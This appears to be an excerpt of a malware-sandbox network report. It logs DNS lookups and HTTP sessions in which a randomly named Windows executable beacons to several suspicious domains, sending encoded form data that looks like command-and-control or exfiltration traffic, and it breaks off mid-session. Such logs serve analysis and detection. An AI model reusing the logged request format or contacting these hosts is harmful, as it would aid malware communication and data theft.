Feb 11, 2025 18:53:14.851650000 CET  1.1.1.1    192.168.2.4  0x50ff    No error (0)  www.fineitemrealm.shop          162.210.195.109  A (IP address)  IN (0x0001)  false
Feb 11, 2025 18:53:28.006263018 CET  1.1.1.1    192.168.2.4  0x29e4    No error (0)  www.globalcase.website          192.64.118.221   A (IP address)  IN (0x0001)  false
Feb 11, 2025 18:53:41.347964048 CET  1.1.1.1    192.168.2.4  0x504c    No error (0)  www.adjokctp.icu                104.21.35.208    A (IP address)  IN (0x0001)  false
Feb 11, 2025 18:53:41.347964048 CET  1.1.1.1    192.168.2.4  0x504c    No error (0)  www.adjokctp.icu                172.67.179.147   A (IP address)  IN (0x0001)  false
                                                                                              • www.cloud-kuprof2.click
                                                                                              • www.erectus.xyz
                                                                                              • www.fineitemrealm.shop
                                                                                              • www.globalcase.website
                                                                                              • www.adjokctp.icu
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49820        57.129.59.27    80                5580  C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe

Timestamp                            Bytes transferred  Direction  Data
Feb 11, 2025 18:52:45.649151087 CET  453                OUT        GET /9kj6/?92tD=AVccbOSLL/+N4XgwVpb4SHGSnAGJIc2w8rOLkxaC3AvUfASlWswjdaveGA5SPzmQwtpsnNNz41sXTUjryKzeRTK3cv4i7oHGDeN1DGdqMP4Wc9jKpdKBVJQ=&ODj=aVdxTb HTTP/1.1
Host: www.cloud-kuprof2.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Feb 11, 2025 18:52:46.252873898 CET  705                IN         HTTP/1.1 404 Not Found
Server: nginx/1.26.2
Date: Tue, 11 Feb 2025 17:52:46 GMT
Content-Type: text/html
Content-Length: 555
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49916        13.248.169.48   80                5580  C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe

Timestamp                            Bytes transferred  Direction  Data
Feb 11, 2025 18:53:01.405036926 CET  712                OUT        POST /cjko/ HTTP/1.1
Host: www.erectus.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Cache-Control: no-cache
Content-Length: 201
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.erectus.xyz
Referer: http://www.erectus.xyz/cjko/
User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Data Ascii: 92tD=6ihTbDU3+TJ32J5fcYAAVWYoPbgjcgcF9HnoVll56cXNOYzTFpeYfJWft0OKSo8UAwY8AoCEC5dZBLIJ1Mjwi+TnTR8OsOZ1cOmsXzCM2eNMfgTmclI2P6da0FxD7SB21mohoEvsoarPMifSCCsQKPlhD+8CdGz11tynKrObJ8mCDNNkBBOuixCoWbiPgKTXcA==
Feb 11, 2025 18:53:02.101883888 CET  73                 IN         HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49928        13.248.169.48   80                5580  C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe

Timestamp                            Bytes transferred  Direction  Data
Feb 11, 2025 18:53:03.952903986 CET  732                OUT        POST /cjko/ HTTP/1.1
Host: www.erectus.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Cache-Control: no-cache
Content-Length: 221
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.erectus.xyz
Referer: http://www.erectus.xyz/cjko/
User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Data Ascii: 92tD=6ihTbDU3+TJ30pJfbL4AT2YrB7gjOgdM9HboVkxT6vzNN5DTUYeYeJWf4EPOfI8PAwEeApOEC5JZBJQJ1fL3weTlKh8MjuZ1cOmsXzW12eVMfQjmcBc1HadZ1FxD/SBy1moHoFzWoZDPMiPSC3AXAPkoMe9HbGG+5OjTXYucWv+jGLA+Qwv5wxmbLcr7tJueHIHl0CefBq1iuz7c9Bol4CM=
Feb 11, 2025 18:53:04.506613970 CET  73                 IN         HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.44994313.248.169.48805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
Timestamp | Bytes transferred | Direction | Data
Feb 11, 2025 18:53:06.499344110 CET | 10814 | OUT | POST /cjko/ HTTP/1.1
                                                                                              Host: www.erectus.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10301
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.erectus.xyz
                                                                                              Referer: http://www.erectus.xyz/cjko/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 36 69 68 54 62 44 55 33 2b 54 4a 33 30 70 4a 66 62 4c 34 41 54 32 59 72 42 37 67 6a 4f 67 64 4d 39 48 62 6f 56 6b 78 54 36 76 37 4e 4f 4b 4c 54 46 4c 6d 59 4d 5a 57 66 6b 55 50 44 66 49 39 56 41 77 4d 61 41 70 54 6d 43 39 35 5a 43 6f 77 4a 6b 2b 4c 33 70 75 54 6c 43 42 38 52 73 4f 5a 61 63 49 47 6f 58 7a 47 31 32 65 56 4d 66 53 37 6d 4c 46 49 31 42 61 64 61 30 46 78 48 37 53 42 61 31 6d 52 79 6f 46 32 68 6f 4a 6a 50 4d 44 2f 53 52 78 30 58 4d 50 6b 6d 4a 65 39 68 62 47 61 78 35 49 48 70 58 5a 4b 36 57 70 43 6a 45 63 74 32 56 52 4b 6d 79 58 4b 5a 64 64 7a 47 68 72 75 51 47 71 2f 72 7a 67 57 6e 62 5a 78 64 6a 43 57 7a 67 44 52 6a 75 56 76 5a 53 4a 55 2b 63 67 6a 65 6b 73 61 6f 32 37 30 75 35 51 61 41 41 36 73 50 69 49 78 70 32 59 72 76 35 54 54 47 61 37 55 68 54 68 78 7a 64 66 6b 63 41 69 71 30 4b 45 48 39 6c 48 69 6c 5a 62 76 64 7a 62 4d 34 59 33 4a 75 6f 6c 44 56 36 68 4d 51 67 6f 34 72 4e 42 70 4b 77 70 71 46 31 69 5a 48 69 70 2b 72 56 41 6d 34 72 56 72 68 52 4f 37 61 43 52 56 5a 45 [TRUNCATED]
                                                                                              Data Ascii: 92tD=6ihTbDU3+TJ30pJfbL4AT2YrB7gjOgdM9HboVkxT6v7NOKLTFLmYMZWfkUPDfI9VAwMaApTmC95ZCowJk+L3puTlCB8RsOZacIGoXzG12eVMfS7mLFI1Bada0FxH7SBa1mRyoF2hoJjPMD/SRx0XMPkmJe9hbGax5IHpXZK6WpCjEct2VRKmyXKZddzGhruQGq/rzgWnbZxdjCWzgDRjuVvZSJU+cgjeksao270u5QaAA6sPiIxp2Yrv5TTGa7UhThxzdfkcAiq0KEH9lHilZbvdzbM4Y3JuolDV6hMQgo4rNBpKwpqF1iZHip+rVAm4rVrhRO7aCRVZEquZnapGYmu6UcaoLxyai9Z+ztCdNHMV/r0D+SbT5Sb7e4Lv173UBHGKj3PzQ4GoR3uEa+GeNEkH+uoAv71YtfaxE7TFktvQZSS37Pyv7s/obWOJU8G/2bKjAzg47IodCim22CDrTj+EB6A1FxUElaZ3YdigF3cXzGJW3WsHSkppN2cGJvXfg6Zxz1apdIGyVtFYYjaGZwDvNMwO0yn3ALzhCDpsv+FUE6MX1AWZ6TYVg0lRgnpprVAQgtnKm/d/qz8GoYeIK/8TynSaKHZ9Bjr46E2aop6fBG6Fnyj3CdyOrGd25b6gNjzUlva95oEgKU3NDE37+Tv684Zisuai60rTYmiVVhGpHv1ZOpQ21oMS4JsT3EcqrxOuH42Pbh1grtzIOsUnl3tabevDW+5g9YN8CnloUhcTa2F0Jhuy799MmLQjWAXlaJclAVe1aQiumlQzNUB9Oq1yX3wpKvX1NzMQ9UyB19dtN/Kou6hbS9dRBsZFN51sGSaJDhDoKe3+AN1NG434r/rzTMr+IxTucKBPt4mX2tisXXESh8Jg9bBSjl7ns9ZahlA+ZECKrFIIuHxQyBAMMGadd6D+VCM3OXJZXGMM/pIIM3vKBpClrv012Bib4exbn0LQRn612fn8ABenmw6OFMCeu5KFW5DmNyx4I+AYyIsr+15 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49959 | 13.248.169.48 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
Timestamp | Bytes transferred | Direction | Data
Feb 11, 2025 18:53:09.207825899 CET | 445 | OUT | GET /cjko/?92tD=3gJzY2hwuTATu+wgM7M2aW4tC9U6eyI05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBqfOHUxMMiqNoXrahRjaCwOMkcSKIcBEhJK4=&ODj=aVdxTb HTTP/1.1
                                                                                              Host: www.erectus.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Feb 11, 2025 18:53:09.633538008 CET | 372 | IN | HTTP/1.1 200 OK
                                                                                              content-type: text/html
                                                                                              date: Tue, 11 Feb 2025 17:53:09 GMT
                                                                                              content-length: 251
                                                                                              connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 32 74 44 3d 33 67 4a 7a 59 32 68 77 75 54 41 54 75 2b 77 67 4d 37 4d 32 61 57 34 74 43 39 55 36 65 79 49 30 35 46 62 73 42 6c 70 2b 6b 2b 33 7a 4f 59 7a 64 61 35 79 39 65 2f 53 44 68 6e 50 31 50 49 67 30 59 68 34 6a 4f 35 48 4f 43 70 74 2f 52 4c 70 4a 72 66 57 42 71 66 4f 48 55 78 4d 4d 69 71 4e 6f 58 72 61 68 52 6a 61 43 77 4f 4d 6b 63 53 4b 49 63 42 45 68 4a 4b 34 3d 26 4f 44 6a 3d 61 56 64 78 54 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?92tD=3gJzY2hwuTATu+wgM7M2aW4tC9U6eyI05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBqfOHUxMMiqNoXrahRjaCwOMkcSKIcBEhJK4=&ODj=aVdxTb"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49995 | 162.210.195.109 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
Timestamp | Bytes transferred | Direction | Data
Feb 11, 2025 18:53:14.874495983 CET | 733 | OUT | POST /c3c5/ HTTP/1.1
                                                                                              Host: www.fineitemrealm.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 201
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.fineitemrealm.shop
                                                                                              Referer: http://www.fineitemrealm.shop/c3c5/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 37 56 53 7a 47 38 69 68 64 58 37 63 74 73 30 59 46 36 78 66 65 4a 58 79 4a 75 2b 70 69 58 4b 71 43 74 44 56 73 64 41 6f 47 31 7a 59 32 42 75 55 39 4b 74 49 4f 46 33 41 67 4f 4a 31 33 74 48 31 37 4e 54 4c 56 2f 48 39 52 73 31 78 49 4c 54 6a 64 78 31 66 68 38 78 77 47 42 53 61 79 32 6e 64 59 6d 61 41 71 57 61 71 46 52 73 6a 79 4e 62 47 52 2f 51 37 63 67 6a 79 62 5a 66 30 4c 48 4c 4a 48 57 37 4d 71 77 38 61 31 37 6e 66 6f 75 44 57 6c 71 69 51 50 4b 54 2f 39 54 42 79 30 52 7a 6a 38 65 41 38 33 6b 37 78 63 4b 70 68 61 76 63 4c 6e 69 4e 6f 66 47 7a 62 4a 51 2f 2f 6d 65 65 77 6f 41 3d 3d
                                                                                              Data Ascii: 92tD=7VSzG8ihdX7cts0YF6xfeJXyJu+piXKqCtDVsdAoG1zY2BuU9KtIOF3AgOJ13tH17NTLV/H9Rs1xILTjdx1fh8xwGBSay2ndYmaAqWaqFRsjyNbGR/Q7cgjybZf0LHLJHW7Mqw8a17nfouDWlqiQPKT/9TBy0Rzj8eA83k7xcKphavcLniNofGzbJQ//meewoA==
Feb 11, 2025 18:53:15.333509922 CET | 886 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 11 Feb 2025 17:53:17 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Last-Modified: Wed, 20 Mar 2024 08:46:13 GMT
                                                                                              ETag: W/"49d-614139f7d9e8f"
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc [TRUNCATED]
                                                                                              Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 50011 | 162.210.195.109 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
Timestamp | Bytes transferred | Direction | Data
Feb 11, 2025 18:53:17.428348064 CET | 753 | OUT | POST /c3c5/ HTTP/1.1
                                                                                              Host: www.fineitemrealm.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 221
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.fineitemrealm.shop
                                                                                              Referer: http://www.fineitemrealm.shop/c3c5/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 37 56 53 7a 47 38 69 68 64 58 37 63 72 4e 6b 59 4a 35 4a 66 50 70 57 41 56 65 2b 70 72 33 4c 68 43 74 48 56 73 63 55 43 61 58 58 59 32 69 36 55 38 50 4e 49 43 6c 33 41 30 65 4a 30 35 4e 48 69 37 4e 65 6f 56 2f 72 39 52 73 68 78 49 50 44 6a 64 47 42 65 7a 38 78 79 59 68 53 59 2f 57 6e 64 59 6d 61 41 71 57 2f 39 46 52 55 6a 75 6f 4c 47 51 61 6b 34 44 51 6a 78 4d 70 66 30 50 48 4c 4e 48 57 36 70 71 78 67 77 31 35 76 66 6f 75 7a 57 6b 37 69 52 57 61 54 39 7a 7a 41 41 36 53 65 51 37 65 46 77 32 56 69 65 62 71 78 75 62 70 52 52 32 54 73 2f 4e 47 58 6f 55 58 32 4c 72 64 6a 35 7a 4f 35 57 70 41 6b 71 2b 52 6b 32 56 69 78 4c 68 4b 75 4b 38 51 55 3d
                                                                                              Data Ascii: 92tD=7VSzG8ihdX7crNkYJ5JfPpWAVe+pr3LhCtHVscUCaXXY2i6U8PNICl3A0eJ05NHi7NeoV/r9RshxIPDjdGBez8xyYhSY/WndYmaAqW/9FRUjuoLGQak4DQjxMpf0PHLNHW6pqxgw15vfouzWk7iRWaT9zzAA6SeQ7eFw2ViebqxubpRR2Ts/NGXoUX2Lrdj5zO5WpAkq+Rk2VixLhKuK8QU=
Feb 11, 2025 18:53:17.869371891 CET | 886 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 11 Feb 2025 17:53:19 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Last-Modified: Wed, 20 Mar 2024 08:46:13 GMT
                                                                                              ETag: W/"49d-614139f7d9e8f"
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc [TRUNCATED]
                                                                                              Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 50016 | 162.210.195.109 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
Timestamp | Bytes transferred | Direction | Data
Feb 11, 2025 18:53:19.982322931 CET | 10835 | OUT | POST /c3c5/ HTTP/1.1
                                                                                              Host: www.fineitemrealm.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10301
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.fineitemrealm.shop
                                                                                              Referer: http://www.fineitemrealm.shop/c3c5/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 37 56 53 7a 47 38 69 68 64 58 37 63 72 4e 6b 59 4a 35 4a 66 50 70 57 41 56 65 2b 70 72 33 4c 68 43 74 48 56 73 63 55 43 61 58 66 59 31 53 6d 55 39 70 46 49 44 6c 33 41 33 65 4a 78 35 4e 48 2f 37 4e 33 68 56 2f 33 74 52 6f 52 78 4a 74 4c 6a 4d 43 64 65 70 73 78 79 51 42 53 62 79 32 6d 41 59 6d 4b 45 71 57 76 39 46 52 55 6a 75 76 7a 47 5a 76 51 34 51 41 6a 79 62 5a 66 34 4c 48 4c 70 48 57 79 54 71 78 6b 4b 79 4a 50 66 6f 4f 6a 57 6e 4a 4b 52 65 61 54 37 30 7a 41 59 36 53 53 50 37 65 5a 57 32 56 48 44 62 6f 74 75 62 49 77 34 71 44 63 37 52 51 57 78 49 6b 75 72 6a 65 2f 76 38 70 31 71 34 56 77 69 74 54 59 6f 4f 41 51 54 79 66 71 49 75 45 77 53 2b 54 4d 35 58 4c 6c 64 51 75 63 68 6e 46 78 56 65 65 7a 37 37 4a 36 61 57 4b 6a 61 61 6e 31 53 4c 7a 48 73 54 4e 4c 38 52 53 37 4d 45 77 78 4c 55 75 65 69 56 73 64 6c 6f 32 41 4e 6b 55 4b 71 36 72 47 6f 5a 6f 66 73 4f 4f 32 2b 53 43 2b 50 57 6b 71 34 41 33 4c 6f 79 48 55 69 4d 67 6a 6c 78 57 70 53 54 58 49 49 53 69 74 59 36 77 67 48 30 30 66 37 6c [TRUNCATED]
Data Ascii: 92tD=7VSzG8ihdX7crNkYJ5JfPpWAVe+pr3LhCtHVscUCaXfY1SmU9pFIDl3A3eJx5NH/7N3hV/3tRoRxJtLjMCdepsxyQBSby2mAYmKEqWv9FRUjuvzGZvQ4QAjybZf4LHLpHWyTqxkKyJPfoOjWnJKReaT70zAY6SSP7eZW2VHDbotubIw4qDc7RQWxIkurje/v8p1q4VwitTYoOAQTyfqIuEwS+TM5XLldQuchnFxVeez77J6aWKjaan1SLzHsTNL8RS7MEwxLUueiVsdlo2ANkUKq6rGoZofsOO2+SC+PWkq4A3LoyHUiMgjlxWpSTXIISitY6wgH00f7l [TRUNCATED]
Feb 11, 2025 18:53:20.442866087 CET | 886 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 11 Feb 2025 17:53:22 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Last-Modified: Wed, 20 Mar 2024 08:46:13 GMT
                                                                                              ETag: W/"49d-614139f7d9e8f"
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc [TRUNCATED]
                                                                                              Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 50017 | 162.210.195.109 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
Timestamp | Bytes transferred | Direction | Data
